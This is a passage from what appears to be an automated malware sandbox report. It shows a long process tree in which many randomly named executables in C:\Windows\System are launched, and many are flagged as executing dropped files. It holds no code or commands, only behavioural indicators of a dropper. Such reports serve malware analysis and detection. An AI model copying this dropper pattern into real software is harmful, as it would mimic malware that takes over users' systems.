  - Executes dropped EXE
  PID:3652
- C:\Windows\System\EWbrrcJ.exe
  C:\Windows\System\EWbrrcJ.exe
  2⤵
  - Executes dropped EXE
  PID:884
- C:\Windows\System\NPDnmVm.exe
  C:\Windows\System\NPDnmVm.exe
  2⤵
  - Executes dropped EXE
  PID:4832
- C:\Windows\System\qnVQlof.exe
  C:\Windows\System\qnVQlof.exe
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\Windows\System\eJsFZuJ.exe
  C:\Windows\System\eJsFZuJ.exe
  2⤵
  - Executes dropped EXE
  PID:4164
- C:\Windows\System\sDrTpAn.exe
  C:\Windows\System\sDrTpAn.exe
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Windows\System\UftqxPi.exe
  C:\Windows\System\UftqxPi.exe
  2⤵
  - Executes dropped EXE
  PID:4864
- C:\Windows\System\bAKuchR.exe
  C:\Windows\System\bAKuchR.exe
  2⤵
  - Executes dropped EXE
  PID:4912
- C:\Windows\System\slLUPgH.exe
  C:\Windows\System\slLUPgH.exe
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Windows\System\UxVhNar.exe
  C:\Windows\System\UxVhNar.exe
  2⤵
  - Executes dropped EXE
  PID:2840
- C:\Windows\System\NOFihyA.exe
  C:\Windows\System\NOFihyA.exe
  2⤵
  - Executes dropped EXE
  PID:3044
- C:\Windows\System\xzqZgiS.exe
  C:\Windows\System\xzqZgiS.exe
  2⤵
  - Executes dropped EXE
  PID:4812
- C:\Windows\System\JltbbrT.exe
  C:\Windows\System\JltbbrT.exe
  2⤵
  - Executes dropped EXE
  PID:2804
- C:\Windows\System\OxPiUAS.exe
  C:\Windows\System\OxPiUAS.exe
  2⤵
  - Executes dropped EXE
  PID:3864
- C:\Windows\System\qSAklew.exe
  C:\Windows\System\qSAklew.exe
  2⤵
  - Executes dropped EXE
  PID:1816
- C:\Windows\System\TtIcUrr.exe
  C:\Windows\System\TtIcUrr.exe
  2⤵
  - Executes dropped EXE
  PID:3208
- C:\Windows\System\tLauZar.exe
  C:\Windows\System\tLauZar.exe
  2⤵
  - Executes dropped EXE
  PID:1980
- C:\Windows\System\YijBggt.exe
  C:\Windows\System\YijBggt.exe
  2⤵
  - Executes dropped EXE
  PID:2032
- C:\Windows\System\ExgyqfQ.exe
  C:\Windows\System\ExgyqfQ.exe
  2⤵
  - Executes dropped EXE
  PID:3424
- C:\Windows\System\nLlYgdA.exe
  C:\Windows\System\nLlYgdA.exe
  2⤵
  - Executes dropped EXE
  PID:1568
- C:\Windows\System\MIJDgUW.exe
  C:\Windows\System\MIJDgUW.exe
  2⤵
  - Executes dropped EXE
  PID:2148
- C:\Windows\System\wvwwtda.exe
  C:\Windows\System\wvwwtda.exe
  2⤵
  - Executes dropped EXE
  PID:4352
- C:\Windows\System\fSPfbVj.exe
  C:\Windows\System\fSPfbVj.exe
  2⤵
  - Executes dropped EXE
  PID:5020
- C:\Windows\System\rioGVSq.exe
  C:\Windows\System\rioGVSq.exe
  2⤵
  - Executes dropped EXE
  PID:4556
- C:\Windows\System\HTgpWZa.exe
  C:\Windows\System\HTgpWZa.exe
  2⤵
  - Executes dropped EXE
  PID:4892
- C:\Windows\System\CsEdHOu.exe
  C:\Windows\System\CsEdHOu.exe
  2⤵
  - Executes dropped EXE
  PID:1476
- C:\Windows\System\ZjKraXD.exe
  C:\Windows\System\ZjKraXD.exe
  2⤵
  - Executes dropped EXE
  PID:1116
- C:\Windows\System\QAKlmhy.exe
  C:\Windows\System\QAKlmhy.exe
  2⤵
  - Executes dropped EXE
  PID:2236
- C:\Windows\System\pFZQyeI.exe
  C:\Windows\System\pFZQyeI.exe
  2⤵
  - Executes dropped EXE
  PID:4144
- C:\Windows\System\qaElvbj.exe
  C:\Windows\System\qaElvbj.exe
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Windows\System\zQZczkd.exe
  C:\Windows\System\zQZczkd.exe
  2⤵
  - Executes dropped EXE
  PID:4688
- C:\Windows\System\CJuFbpW.exe
  C:\Windows\System\CJuFbpW.exe
  2⤵
  - Executes dropped EXE
  PID:4236
- C:\Windows\System\KCgYGEw.exe
  C:\Windows\System\KCgYGEw.exe
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Windows\System\vFFcwgO.exe
  C:\Windows\System\vFFcwgO.exe
  2⤵
  - Executes dropped EXE
  PID:4312
- C:\Windows\System\OfgWxTe.exe
  C:\Windows\System\OfgWxTe.exe
  2⤵
  - Executes dropped EXE
  PID:1432
- C:\Windows\System\vcNPWst.exe
  C:\Windows\System\vcNPWst.exe
  2⤵
  - Executes dropped EXE
  PID:712
- C:\Windows\System\cRlpBmO.exe
  C:\Windows\System\cRlpBmO.exe
  2⤵
  - Executes dropped EXE
  PID:2516
- C:\Windows\System\RlUIzWp.exe
  C:\Windows\System\RlUIzWp.exe
  2⤵
  - Executes dropped EXE
  PID:668
- C:\Windows\System\xzhxpoC.exe
  C:\Windows\System\xzhxpoC.exe
  2⤵
  - Executes dropped EXE
  PID:3132
- C:\Windows\System\JZcHMQe.exe
  C:\Windows\System\JZcHMQe.exe
  2⤵
  - Executes dropped EXE
  PID:3628
- C:\Windows\System\ulRrmQe.exe
  C:\Windows\System\ulRrmQe.exe
  2⤵
  - Executes dropped EXE
  PID:3948
- C:\Windows\System\CxePGyW.exe
  C:\Windows\System\CxePGyW.exe
  2⤵
  - Executes dropped EXE
  PID:2492
- C:\Windows\System\sUKxIfZ.exe
  C:\Windows\System\sUKxIfZ.exe
  2⤵
  - Executes dropped EXE
  PID:4400
- C:\Windows\System\ylETqmU.exe
  C:\Windows\System\ylETqmU.exe
  2⤵
  - Executes dropped EXE
  PID:872
- C:\Windows\System\TcaEOas.exe
  C:\Windows\System\TcaEOas.exe
  2⤵
  - Executes dropped EXE
  PID:4428
- C:\Windows\System\RvYQrvw.exe
  C:\Windows\System\RvYQrvw.exe
  2⤵
  - Executes dropped EXE
  PID:3692
- C:\Windows\System\pgCNdzZ.exe
  C:\Windows\System\pgCNdzZ.exe
  2⤵
  - Executes dropped EXE
  PID:3336
- C:\Windows\System\vutyBun.exe
  C:\Windows\System\vutyBun.exe
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Windows\System\nOWKdzH.exe
  C:\Windows\System\nOWKdzH.exe
  2⤵
  - Executes dropped EXE
  PID:508
- C:\Windows\System\wIVvQEt.exe
  C:\Windows\System\wIVvQEt.exe
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Windows\System\DdsFxGa.exe
  C:\Windows\System\DdsFxGa.exe
  2⤵
  - Executes dropped EXE
  PID:4172
- C:\Windows\System\ghfejbr.exe
  C:\Windows\System\ghfejbr.exe
  2⤵
  - Executes dropped EXE
  PID:1788
- C:\Windows\System\jiHcaBR.exe
  C:\Windows\System\jiHcaBR.exe
  2⤵
  - Executes dropped EXE
  PID:3452
- C:\Windows\System\eietBJQ.exe
  C:\Windows\System\eietBJQ.exe
  2⤵
  - Executes dropped EXE
  PID:4292
- C:\Windows\System\ADSEgTo.exe
  C:\Windows\System\ADSEgTo.exe
  2⤵
  - Executes dropped EXE
  PID:2944
- C:\Windows\System\fzErwac.exe
  C:\Windows\System\fzErwac.exe
  2⤵
  - Executes dropped EXE
  PID:3488
- C:\Windows\System\iiNowsV.exe
  C:\Windows\System\iiNowsV.exe
  2⤵
  - Executes dropped EXE
  PID:4220
- C:\Windows\System\yFUuDLX.exe
  C:\Windows\System\yFUuDLX.exe
  2⤵
  - Executes dropped EXE
  PID:1948
- C:\Windows\System\NrOckfZ.exe
  C:\Windows\System\NrOckfZ.exe
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Windows\System\Dbwxciz.exe
  C:\Windows\System\Dbwxciz.exe
  2⤵
  PID:5140
- C:\Windows\System\yOZWiuT.exe
  C:\Windows\System\yOZWiuT.exe
  2⤵
  PID:5172
- C:\Windows\System\XUEeOPy.exe
  C:\Windows\System\XUEeOPy.exe
  2⤵
  PID:5200
- C:\Windows\System\YebrRlT.exe
  C:\Windows\System\YebrRlT.exe
  2⤵
  PID:5228
- C:\Windows\System\RFXRYvR.exe
  C:\Windows\System\RFXRYvR.exe
  2⤵
  PID:5256
- C:\Windows\System\mrMrJLL.exe
  C:\Windows\System\mrMrJLL.exe
  2⤵
  PID:5284
- C:\Windows\System\ARhBmes.exe
  C:\Windows\System\ARhBmes.exe
  2⤵
  PID:5316
- C:\Windows\System\TGxDGGt.exe
  C:\Windows\System\TGxDGGt.exe
  2⤵
  PID:5344
- C:\Windows\System\ZAqnfQG.exe
  C:\Windows\System\ZAqnfQG.exe
  2⤵
  PID:5376
- C:\Windows\System\kwKfPFa.exe
  C:\Windows\System\kwKfPFa.exe
  2⤵
  PID:5408
- C:\Windows\System\CjzxEKX.exe
  C:\Windows\System\CjzxEKX.exe
  2⤵
  PID:5436
- C:\Windows\System\EDMUTec.exe
  C:\Windows\System\EDMUTec.exe
  2⤵
  PID:5464
- C:\Windows\System\EkMtUdv.exe
  C:\Windows\System\EkMtUdv.exe
  2⤵
  PID:5492
- C:\Windows\System\kUXIdmB.exe
  C:\Windows\System\kUXIdmB.exe
  2⤵
  PID:5520
- C:\Windows\System\iNpEDCo.exe
  C:\Windows\System\iNpEDCo.exe
  2⤵
  PID:5552
- C:\Windows\System\qBnTBTE.exe
  C:\Windows\System\qBnTBTE.exe
  2⤵
  PID:5580
- C:\Windows\System\RKnXMBW.exe
  C:\Windows\System\RKnXMBW.exe
  2⤵
  PID:5608
- C:\Windows\System\wnvREtT.exe
  C:\Windows\System\wnvREtT.exe
  2⤵
  PID:5636
- C:\Windows\System\IhKlUyR.exe
  C:\Windows\System\IhKlUyR.exe
  2⤵
  PID:5664
- C:\Windows\System\GNvUAcp.exe
  C:\Windows\System\GNvUAcp.exe
  2⤵
  PID:5692
- C:\Windows\System\XyrhUgx.exe
  C:\Windows\System\XyrhUgx.exe
  2⤵
  PID:5720
- C:\Windows\System\ytTdpwe.exe
  C:\Windows\System\ytTdpwe.exe
  2⤵
  PID:5748
- C:\Windows\System\tsDqPCd.exe
  C:\Windows\System\tsDqPCd.exe
  2⤵
  PID:5776
- C:\Windows\System\Rjqcksh.exe
  C:\Windows\System\Rjqcksh.exe
  2⤵
  PID:5804
- C:\Windows\System\EYILuab.exe
  C:\Windows\System\EYILuab.exe
  2⤵
  PID:5832
- C:\Windows\System\SoWMIQq.exe
  C:\Windows\System\SoWMIQq.exe
  2⤵
  PID:5860
- C:\Windows\System\SbsRSQh.exe
  C:\Windows\System\SbsRSQh.exe
  2⤵
  PID:5892
- C:\Windows\System\dSdXFIx.exe
  C:\Windows\System\dSdXFIx.exe
  2⤵
  PID:5920
- C:\Windows\System\TEdfCxN.exe
  C:\Windows\System\TEdfCxN.exe
  2⤵
  PID:5948
- C:\Windows\System\QtZbXLI.exe
  C:\Windows\System\QtZbXLI.exe
  2⤵
  PID:5976
- C:\Windows\System\RXkGxZW.exe
  C:\Windows\System\RXkGxZW.exe
  2⤵
  PID:6004
- C:\Windows\System\PQvpenj.exe
  C:\Windows\System\PQvpenj.exe
  2⤵
  PID:6032
- C:\Windows\System\WYmSngv.exe
  C:\Windows\System\WYmSngv.exe
  2⤵
  PID:6060
- C:\Windows\System\KYTWqGo.exe
  C:\Windows\System\KYTWqGo.exe
  2⤵
  PID:6088
- C:\Windows\System\HcGOxpX.exe
  C:\Windows\System\HcGOxpX.exe
  2⤵
  PID:6116
- C:\Windows\System\XtBCBBw.exe
  C:\Windows\System\XtBCBBw.exe
  2⤵
  PID:3524
- C:\Windows\System\SVSuBLe.exe
  C:\Windows\System\SVSuBLe.exe
  2⤵
  PID:3276
- C:\Windows\System\KVIbrjY.exe
  C:\Windows\System\KVIbrjY.exe
  2⤵
  PID:224
- C:\Windows\System\MQEpJIE.exe
  C:\Windows\System\MQEpJIE.exe
  2⤵
  PID:3940
- C:\Windows\System\YaDcyKb.exe
  C:\Windows\System\YaDcyKb.exe
  2⤵
  PID:4544
- C:\Windows\System\AecOCDz.exe
  C:\Windows\System\AecOCDz.exe
  2⤵
  PID:5128
- C:\Windows\System\IOhHDAT.exe
  C:\Windows\System\IOhHDAT.exe
  2⤵
  PID:1428
- C:\Windows\System\VffGsIJ.exe
  C:\Windows\System\VffGsIJ.exe
  2⤵
  PID:5240
- C:\Windows\System\zELuxBX.exe
  C:\Windows\System\zELuxBX.exe
  2⤵
  PID:5304
- C:\Windows\System\qAbgVoB.exe
  C:\Windows\System\qAbgVoB.exe
  2⤵
  PID:5368
- C:\Windows\System\StuKiAW.exe
  C:\Windows\System\StuKiAW.exe
  2⤵
  PID:5448
- C:\Windows\System\HdKAMhf.exe
  C:\Windows\System\HdKAMhf.exe
  2⤵
  PID:5508
- C:\Windows\System\LdgLTDg.exe
  C:\Windows\System\LdgLTDg.exe
  2⤵
  PID:5572
- C:\Windows\System\RbhmKpU.exe
  C:\Windows\System\RbhmKpU.exe
  2⤵
  PID:5648
- C:\Windows\System\SCYQMlt.exe
  C:\Windows\System\SCYQMlt.exe
  2⤵
  PID:5708
- C:\Windows\System\rekhIGQ.exe
  C:\Windows\System\rekhIGQ.exe
  2⤵
  PID:5764
- C:\Windows\System\MpxLfRF.exe
  C:\Windows\System\MpxLfRF.exe
  2⤵
  PID:5816
- C:\Windows\System\dkDkDmc.exe
  C:\Windows\System\dkDkDmc.exe
  2⤵
  PID:5852
- C:\Windows\System\LfmilkG.exe
  C:\Windows\System\LfmilkG.exe
  2⤵
  PID:4820
- C:\Windows\System\LWeftrT.exe
  C:\Windows\System\LWeftrT.exe
  2⤵
  PID:5960
- C:\Windows\System\tzqBvMx.exe
  C:\Windows\System\tzqBvMx.exe
  2⤵
  PID:6024
- C:\Windows\System\eHTbLBZ.exe
  C:\Windows\System\eHTbLBZ.exe
  2⤵
  PID:6080
- C:\Windows\System\XLjVmUg.exe
  C:\Windows\System\XLjVmUg.exe
  2⤵
  PID:2368
- C:\Windows\System\GwCTVnr.exe
  C:\Windows\System\GwCTVnr.exe
  2⤵
  PID:4648
- C:\Windows\System\LzpIkgl.exe
  C:\Windows\System\LzpIkgl.exe
  2⤵
  PID:4456
- C:\Windows\System\rpLSSdt.exe
  C:\Windows\System\rpLSSdt.exe
  2⤵
  PID:5220
- C:\Windows\System\hJEFTAV.exe
  C:\Windows\System\hJEFTAV.exe
  2⤵
  PID:5360
- C:\Windows\System\TyYgUhE.exe
  C:\Windows\System\TyYgUhE.exe
  2⤵
  PID:5540
- C:\Windows\System\OuqjglV.exe
  C:\Windows\System\OuqjglV.exe
  2⤵
  PID:5624
- C:\Windows\System\FyQwlFV.exe
  C:\Windows\System\FyQwlFV.exe
  2⤵
  PID:5788
- C:\Windows\System\zdwbnDh.exe
  C:\Windows\System\zdwbnDh.exe
  2⤵
  PID:6104
- C:\Windows\System\NGaOMRA.exe
  C:\Windows\System\NGaOMRA.exe
  2⤵
  PID:6016
- C:\Windows\System\zCKiaab.exe
  C:\Windows\System\zCKiaab.exe
  2⤵
  PID:6132
- C:\Windows\System\vLtjlXI.exe
  C:\Windows\System\vLtjlXI.exe
  2⤵
  PID:2476
- C:\Windows\System\JQwfmRX.exe
  C:\Windows\System\JQwfmRX.exe
  2⤵
  PID:1688
- C:\Windows\System\DluNBzh.exe
  C:\Windows\System\DluNBzh.exe
  2⤵
  PID:1572
- C:\Windows\System\lpgfMFv.exe
  C:\Windows\System\lpgfMFv.exe
  2⤵
  PID:3256
- C:\Windows\System\bnmpZMX.exe
  C:\Windows\System\bnmpZMX.exe
  2⤵
  PID:6152
- C:\Windows\System\XjMVjaG.exe
  C:\Windows\System\XjMVjaG.exe
  2⤵
  PID:6180
- C:\Windows\System\RTgIpCH.exe
  C:\Windows\System\RTgIpCH.exe
  2⤵
  PID:6208
- C:\Windows\System\nJAINJD.exe
  C:\Windows\System\nJAINJD.exe
  2⤵
  PID:6240
- C:\Windows\System\JjEJiew.exe
  C:\Windows\System\JjEJiew.exe
  2⤵
  PID:6264
- C:\Windows\System\xMpWukY.exe
  C:\Windows\System\xMpWukY.exe
  2⤵
  PID:6292
- C:\Windows\System\KfMiedC.exe
  C:\Windows\System\KfMiedC.exe
  2⤵
  PID:6320
- C:\Windows\System\HDrVnuq.exe
  C:\Windows\System\HDrVnuq.exe
  2⤵
  PID:6348
- C:\Windows\System\OfYjUkO.exe
  C:\Windows\System\OfYjUkO.exe
  2⤵
  PID:6376
- C:\Windows\System\wRZffJy.exe
  C:\Windows\System\wRZffJy.exe
  2⤵
  PID:6404
- C:\Windows\System\rQaxOyi.exe
  C:\Windows\System\rQaxOyi.exe
  2⤵
  PID:6436
- C:\Windows\System\rFJnOaK.exe
  C:\Windows\System\rFJnOaK.exe
  2⤵
  PID:6464
- C:\Windows\System\GKfwVfd.exe
  C:\Windows\System\GKfwVfd.exe
  2⤵
  PID:6492
- C:\Windows\System\thHyBJC.exe
  C:\Windows\System\thHyBJC.exe
  2⤵
  PID:6516
- C:\Windows\System\NHtZHHa.exe
  C:\Windows\System\NHtZHHa.exe
  2⤵
  PID:6544
- C:\Windows\System\KNoXvqZ.exe
  C:\Windows\System\KNoXvqZ.exe
  2⤵
  PID:6576
- C:\Windows\System\GGKHBVY.exe
  C:\Windows\System\GGKHBVY.exe
  2⤵
  PID:6604
- C:\Windows\System\MPJGDKZ.exe
  C:\Windows\System\MPJGDKZ.exe
  2⤵
  PID:6632
- C:\Windows\System\BDGXeds.exe
  C:\Windows\System\BDGXeds.exe
  2⤵
  PID:6656
- C:\Windows\System\mvaSLbI.exe
  C:\Windows\System\mvaSLbI.exe
  2⤵
  PID:6684
- C:\Windows\System\bqkBxic.exe
  C:\Windows\System\bqkBxic.exe
  2⤵
  PID:6712
- C:\Windows\System\nJhUMdw.exe
  C:\Windows\System\nJhUMdw.exe
  2⤵
  PID:6740
- C:\Windows\System\lLsaCUk.exe
  C:\Windows\System\lLsaCUk.exe
  2⤵
  PID:6768
- C:\Windows\System\eRWMJRy.exe
  C:\Windows\System\eRWMJRy.exe
  2⤵
  PID:6796
- C:\Windows\System\HmOWcMl.exe
  C:\Windows\System\HmOWcMl.exe
  2⤵
  PID:6824
- C:\Windows\System\XvvxRfH.exe
  C:\Windows\System\XvvxRfH.exe
  2⤵
  PID:6852
- C:\Windows\System\xqtDpYS.exe
  C:\Windows\System\xqtDpYS.exe
  2⤵
  PID:6880
- C:\Windows\System\CccfqaV.exe
  C:\Windows\System\CccfqaV.exe
  2⤵
  PID:6912
- C:\Windows\System\JNeIVyi.exe
  C:\Windows\System\JNeIVyi.exe
  2⤵
  PID:7020
- C:\Windows\System\LNjnYth.exe
  C:\Windows\System\LNjnYth.exe
  2⤵
  PID:7040
- C:\Windows\System\nVypqvj.exe
  C:\Windows\System\nVypqvj.exe
  2⤵
  PID:7068
- C:\Windows\System\mYqWNVL.exe
  C:\Windows\System\mYqWNVL.exe
  2⤵
  PID:7092
- C:\Windows\System\SiqjjIy.exe
  C:\Windows\System\SiqjjIy.exe
  2⤵
  PID:7128
- C:\Windows\System\kjaCKwr.exe
  C:\Windows\System\kjaCKwr.exe
  2⤵
  PID:7152
- C:\Windows\System\JgjlYbx.exe
  C:\Windows\System\JgjlYbx.exe
  2⤵
  PID:5884
- C:\Windows\System\GqvOeOo.exe
  C:\Windows\System\GqvOeOo.exe
  2⤵
  PID:2500
- C:\Windows\System\brfyXiL.exe
  C:\Windows\System\brfyXiL.exe
  2⤵
  PID:1732
- C:\Windows\System\tCmvJDY.exe
  C:\Windows\System\tCmvJDY.exe
  2⤵
  PID:5192
- C:\Windows\System\PNkfXtG.exe
  C:\Windows\System\PNkfXtG.exe
  2⤵
  PID:2760
- C:\Windows\System\mNidABS.exe
  C:\Windows\System\mNidABS.exe
  2⤵
  PID:6204
- C:\Windows\System\yvJDGLJ.exe
  C:\Windows\System\yvJDGLJ.exe
  2⤵
  PID:6280
- C:\Windows\System\KsWmNCS.exe
  C:\Windows\System\KsWmNCS.exe
  2⤵
  PID:6316
- C:\Windows\System\yhobruL.exe
  C:\Windows\System\yhobruL.exe
  2⤵
  PID:6368
- C:\Windows\System\ZczvGbn.exe
  C:\Windows\System\ZczvGbn.exe
  2⤵
  PID:6424
- C:\Windows\System\GCNusoI.exe
  C:\Windows\System\GCNusoI.exe
  2⤵
  PID:6452
- C:\Windows\System\BymsZJT.exe
  C:\Windows\System\BymsZJT.exe
  2⤵
  PID:2800
- C:\Windows\System\wKWdjeP.exe
  C:\Windows\System\wKWdjeP.exe
  2⤵
  PID:6504
- C:\Windows\System\iggmobe.exe
  C:\Windows\System\iggmobe.exe
  2⤵
  PID:6532
- C:\Windows\System\OyvHrrF.exe
  C:\Windows\System\OyvHrrF.exe
  2⤵
  PID:1804
- C:\Windows\System\vksbQIn.exe
  C:\Windows\System\vksbQIn.exe
  2⤵
  PID:6644
- C:\Windows\System\WdOhYqu.exe
  C:\Windows\System\WdOhYqu.exe
  2⤵
  PID:6680
- C:\Windows\System\slLWlxT.exe
  C:\Windows\System\slLWlxT.exe
  2⤵
  PID:6732
- C:\Windows\System\XTKqTvZ.exe
  C:\Windows\System\XTKqTvZ.exe
  2⤵
  PID:4068
- C:\Windows\System\llFFDnX.exe
  C:\Windows\System\llFFDnX.exe
  2⤵
  PID:5044
- C:\Windows\System\bZfBqgq.exe
  C:\Windows\System\bZfBqgq.exe
  2⤵
  PID:1092
- C:\Windows\System\fIzqKhQ.exe
  C:\Windows\System\fIzqKhQ.exe
  2⤵
  PID:4008
- C:\Windows\System\UrTRyJv.exe
  C:\Windows\System\UrTRyJv.exe
  2⤵
  PID:4636
- C:\Windows\System\gbosvZq.exe
  C:\Windows\System\gbosvZq.exe
  2⤵
  PID:6876
- C:\Windows\System\uzOCtRB.exe
  C:\Windows\System\uzOCtRB.exe
  2⤵
  PID:1096
- C:\Windows\System\sENcsHF.exe
  C:\Windows\System\sENcsHF.exe
  2⤵
  PID:7064
- C:\Windows\System\YZkdIBb.exe
  C:\Windows\System\YZkdIBb.exe
  2⤵
  PID:7116
- C:\Windows\System\pTKNkDV.exe
  C:\Windows\System\pTKNkDV.exe
  2⤵
  PID:4576
- C:\Windows\System\bOVcNwb.exe
  C:\Windows\System\bOVcNwb.exe
  2⤵
  PID:6056
- C:\Windows\System\DcEZZeR.exe
  C:\Windows\System\DcEZZeR.exe
  2⤵
  PID:1892
- C:\Windows\System\yLCCzQJ.exe
  C:\Windows\System\yLCCzQJ.exe
  2⤵
  PID:6168
- C:\Windows\System\FCTMGxB.exe
  C:\Windows\System\FCTMGxB.exe
  2⤵
  PID:6392
- C:\Windows\System\rCiXQcO.exe
  C:\Windows\System\rCiXQcO.exe
  2⤵
  PID:4548
- C:\Windows\System\AYiXzML.exe
  C:\Windows\System\AYiXzML.exe
  2⤵
  PID:6592
- C:\Windows\System\DVQpalU.exe
  C:\Windows\System\DVQpalU.exe
  2⤵
  PID:6708
- C:\Windows\System\FanmrxM.exe
  C:\Windows\System\FanmrxM.exe
  2⤵
  PID:6764
- C:\Windows\System\dnSDYIx.exe
  C:\Windows\System\dnSDYIx.exe
  2⤵
  PID:2212
- C:\Windows\System\MWYPvvs.exe
  C:\Windows\System\MWYPvvs.exe
  2⤵
  PID:7016
- C:\Windows\System\yqACUCw.exe
  C:\Windows\System\yqACUCw.exe
  2⤵
  PID:6900
- C:\Windows\System\QHwPczh.exe
  C:\Windows\System\QHwPczh.exe
  2⤵
  PID:5484
- C:\Windows\System\dCSFrvf.exe
  C:\Windows\System\dCSFrvf.exe
  2⤵
  PID:6344
- C:\Windows\System\jXqVhAN.exe
  C:\Windows\System\jXqVhAN.exe
  2⤵
  PID:6448
- C:\Windows\System\umMXgHx.exe
  C:\Windows\System\umMXgHx.exe
  2⤵
  PID:396
- C:\Windows\System\LiaxNOX.exe
  C:\Windows\System\LiaxNOX.exe
  2⤵
  PID:4808
- C:\Windows\System\vInTCwU.exe
  C:\Windows\System\vInTCwU.exe
  2⤵
  PID:4860
- C:\Windows\System\IWTixGQ.exe
  C:\Windows\System\IWTixGQ.exe
  2⤵
  PID:4760
- C:\Windows\System\vGzbftO.exe
  C:\Windows\System\vGzbftO.exe
  2⤵
  PID:2340
- C:\Windows\System\rhtcMFM.exe
  C:\Windows\System\rhtcMFM.exe
  2⤵
  PID:7172
- C:\Windows\System\zWtRvrZ.exe
  C:\Windows\System\zWtRvrZ.exe
  2⤵
  PID:7200
- C:\Windows\System\YNGMFdQ.exe
  C:\Windows\System\YNGMFdQ.exe
  2⤵
  PID:7216
- C:\Windows\System\DbIbTcd.exe
  C:\Windows\System\DbIbTcd.exe
  2⤵
  PID:7252
- C:\Windows\System\ZaQDWqM.exe
  C:\Windows\System\ZaQDWqM.exe
  2⤵
  PID:7276
- C:\Windows\System\UhGhXWi.exe
  C:\Windows\System\UhGhXWi.exe
  2⤵
  PID:7304
- C:\Windows\System\addYmMx.exe
  C:\Windows\System\addYmMx.exe
  2⤵
  PID:7344
- C:\Windows\System\RxUwFfg.exe
  C:\Windows\System\RxUwFfg.exe
  2⤵
  PID:7384
- C:\Windows\System\wtDYmeF.exe
  C:\Windows\System\wtDYmeF.exe
  2⤵
  PID:7420
- C:\Windows\System\iLddDVF.exe
  C:\Windows\System\iLddDVF.exe
  2⤵
  PID:7444
- C:\Windows\System\KtimMSz.exe
  C:\Windows\System\KtimMSz.exe
  2⤵
  PID:7472
- C:\Windows\System\xNPOPus.exe
  C:\Windows\System\xNPOPus.exe
  2⤵
  PID:7492
- C:\Windows\System\LHxrVfb.exe
  C:\Windows\System\LHxrVfb.exe
  2⤵
  PID:7516
- C:\Windows\System\lTfvgqH.exe
  C:\Windows\System\lTfvgqH.exe
  2⤵
  PID:7556
- C:\Windows\System\IfXaPbe.exe
  C:\Windows\System\IfXaPbe.exe
  2⤵
  PID:7576
- C:\Windows\System\qfCHHKS.exe
  C:\Windows\System\qfCHHKS.exe
  2⤵
  PID:7616
- C:\Windows\System\ZkUpHCq.exe
  C:\Windows\System\ZkUpHCq.exe
  2⤵
  PID:7640
- C:\Windows\System\yNcpebX.exe
  C:\Windows\System\yNcpebX.exe
  2⤵
  PID:7664
- C:\Windows\System\gizNWCr.exe
  C:\Windows\System\gizNWCr.exe
  2⤵
  PID:7688
- C:\Windows\System\UlEBQCF.exe
  C:\Windows\System\UlEBQCF.exe
  2⤵
  PID:7708
- C:\Windows\System\StpLpuL.exe
  C:\Windows\System\StpLpuL.exe
  2⤵
  PID:7724
- C:\Windows\System\cYWFlst.exe
  C:\Windows\System\cYWFlst.exe
  2⤵
  PID:7752
- C:\Windows\System\JdOzQIz.exe
  C:\Windows\System\JdOzQIz.exe
  2⤵
  PID:7800
- C:\Windows\System\BBVfStD.exe
  C:\Windows\System\BBVfStD.exe
  2⤵
  PID:7820
- C:\Windows\System\WFaXnFO.exe
  C:\Windows\System\WFaXnFO.exe
  2⤵
  PID:7848
- C:\Windows\System\NnhBxkl.exe
  C:\Windows\System\NnhBxkl.exe
  2⤵
  PID:7892
- C:\Windows\System\gVvuYAq.exe
  C:\Windows\System\gVvuYAq.exe
  2⤵
  PID:7908
- C:\Windows\System\QQleSzL.exe
  C:\Windows\System\QQleSzL.exe
  2⤵
  PID:7928
- C:\Windows\System\CelZCuo.exe
  C:\Windows\System\CelZCuo.exe
  2⤵
  PID:7944
- C:\Windows\System\OglaANb.exe
  C:\Windows\System\OglaANb.exe
  2⤵
  PID:7964
- C:\Windows\System\fVEnvkb.exe
  C:\Windows\System\fVEnvkb.exe
  2⤵
  PID:8000
- C:\Windows\System\QqZiAYB.exe
  C:\Windows\System\QqZiAYB.exe
  2⤵
  PID:8020
- C:\Windows\System\HcWicuE.exe
  C:\Windows\System\HcWicuE.exe
  2⤵
  PID:8064
- C:\Windows\System\fSfDojX.exe
  C:\Windows\System\fSfDojX.exe
  2⤵
  PID:8096
- C:\Windows\System\gcZbddi.exe
  C:\Windows\System\gcZbddi.exe
  2⤵
  PID:8116
- C:\Windows\System\UsXbxyg.exe
  C:\Windows\System\UsXbxyg.exe
  2⤵
  PID:8140
- C:\Windows\System\bjKIyaK.exe
  C:\Windows\System\bjKIyaK.exe
  2⤵
  PID:8160
- C:\Windows\System\dChhjmx.exe
  C:\Windows\System\dChhjmx.exe
  2⤵
  PID:6340
- C:\Windows\System\JWEuSve.exe
  C:\Windows\System\JWEuSve.exe
  2⤵
  PID:7212
- C:\Windows\System\GphlfYD.exe
  C:\Windows\System\GphlfYD.exe
  2⤵
  PID:7232
- C:\Windows\System\ZFxKlNF.exe
  C:\Windows\System\ZFxKlNF.exe
  2⤵
  PID:7260
- C:\Windows\System\ENuCwrd.exe
  C:\Windows\System\ENuCwrd.exe
  2⤵
  PID:7452
- C:\Windows\System\bvrFKPD.exe
  C:\Windows\System\bvrFKPD.exe
  2⤵
  PID:7488
- C:\Windows\System\aSwjVNR.exe
  C:\Windows\System\aSwjVNR.exe
  2⤵
  PID:7552
- C:\Windows\System\MswdlQg.exe
  C:\Windows\System\MswdlQg.exe
  2⤵
  PID:7660
- C:\Windows\System\lRcGAcp.exe
  C:\Windows\System\lRcGAcp.exe
  2⤵
  PID:7680
- C:\Windows\System\SuWujwm.exe
  C:\Windows\System\SuWujwm.exe
  2⤵
  PID:7788
- C:\Windows\System\XSkGSDn.exe
  C:\Windows\System\XSkGSDn.exe
  2⤵
  PID:7860
- C:\Windows\System\PsUYGVI.exe
  C:\Windows\System\PsUYGVI.exe
  2⤵
  PID:7916
- C:\Windows\System\ZtmvRYM.exe
  C:\Windows\System\ZtmvRYM.exe
  2⤵
  PID:7940
- C:\Windows\System\jsPluys.exe
  C:\Windows\System\jsPluys.exe
  2⤵
  PID:8104
- C:\Windows\System\gcayoNj.exe
  C:\Windows\System\gcayoNj.exe
  2⤵
